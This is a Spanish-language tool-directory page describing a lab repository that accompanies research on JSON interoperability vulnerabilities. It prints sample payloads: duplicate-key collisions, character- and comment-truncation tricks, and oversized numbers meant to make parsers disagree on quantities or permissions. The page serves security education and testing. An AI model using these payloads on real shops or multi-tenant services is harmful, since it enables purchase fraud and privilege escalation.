Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
json-interop-vuln-labs — Laboratorios complementarios de "Una exploración de las vulnerabilidades de interoperabilidad JSON" | Kitploit
Herramientas/GitHubGitHub/bishopfox/json-interop-vuln-labs
Análisis de VulnerabilidadesExplotación de Aplicaciones WebSeguridad WebAprendizaje y EducaciónLabs y Práctica
GitHubbishopfox/json-interop-vuln-labs

json-interop-vuln-labs

Laboratorios complementarios de "Una exploración de las vulnerabilidades de interoperabilidad JSON"

Ver Repositorio
21019hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Sitio web

Laboratorios de Vulnerabilidades de Interoperabilidad JSON

Descripción

Estos son los laboratorios complementarios a mi artículo de investigación "An Exploration of JSON Interoperability Vulnerabilities".

Laboratorio 1: Compras gratuitas en una aplicación de comercio electrónico

  • Ataques de colisión de claves: Precedencia inconsistente de claves duplicadas
  • Representaciones inconsistentes de números grandes

Laboratorio 2: Escalada de privilegios en una aplicación multiinquilino

  • Ataques de colisión de claves: Truncamiento de caracteres

Estos laboratorios se vinculan a los puertos 5000-5004 del host, por defecto.

Técnicas de ataque

1. Colisiones de claves

Precedencia inconsistente de claves duplicadas

root@kitploit:~
{"qty": 1, "qty": -1}

Truncamiento de caracteres

Truncamiento en analizadores con precedencia de la última clave (invierta el orden para precedencia de la primera clave)

root@kitploit:~
{"qty": 1, "qty\<raw \x0d byte here>": -1}
{"qty": 1, "qty\ud800": -1} # Any unpaired surrogate U+D800-U+DFFF
{"qty": 1, "qty"": -1}
{"qty": 1, "qt\y": -1}

Truncamiento de comentarios

Estos documentos aprovechan el soporte inconsistente de comentarios y el soporte de cadenas sin comillas:

root@kitploit:~
{"qty": 1, "extra": 1/*, "qty": -1, "extra2": 2*/}
{"qty": 1, "extra": a/*, "qty": -1, "extra2": b*/}
{"qty": 1, "extra": "a/*", "qty": -1, "extra2": "b"*/}
{"qty": 1, "extra": "a"//, "qty": -1}

2. Decodificación de números

Decodificación inconsistente de números grandes

Estos valores numéricos grandes pueden convertirse en cadenas (Strings) (p. ej., "+Infinity"), lo que puede dar lugar a vulnerabilidades de manipulación de tipos (type juggling). O pueden convertirse en MAX_INT/MIN_INT, valores redondeados o 0, lo que podría permitir eludir la lógica de negocio.

root@kitploit:~
{"qty": 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999}
{"qty": -999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999}
{"qty": 1.0e4096}
{"qty": -1.0e4096}

Autor

Twitter: @theBumbleSec

GitHub: the-bumble

Descargar herramienta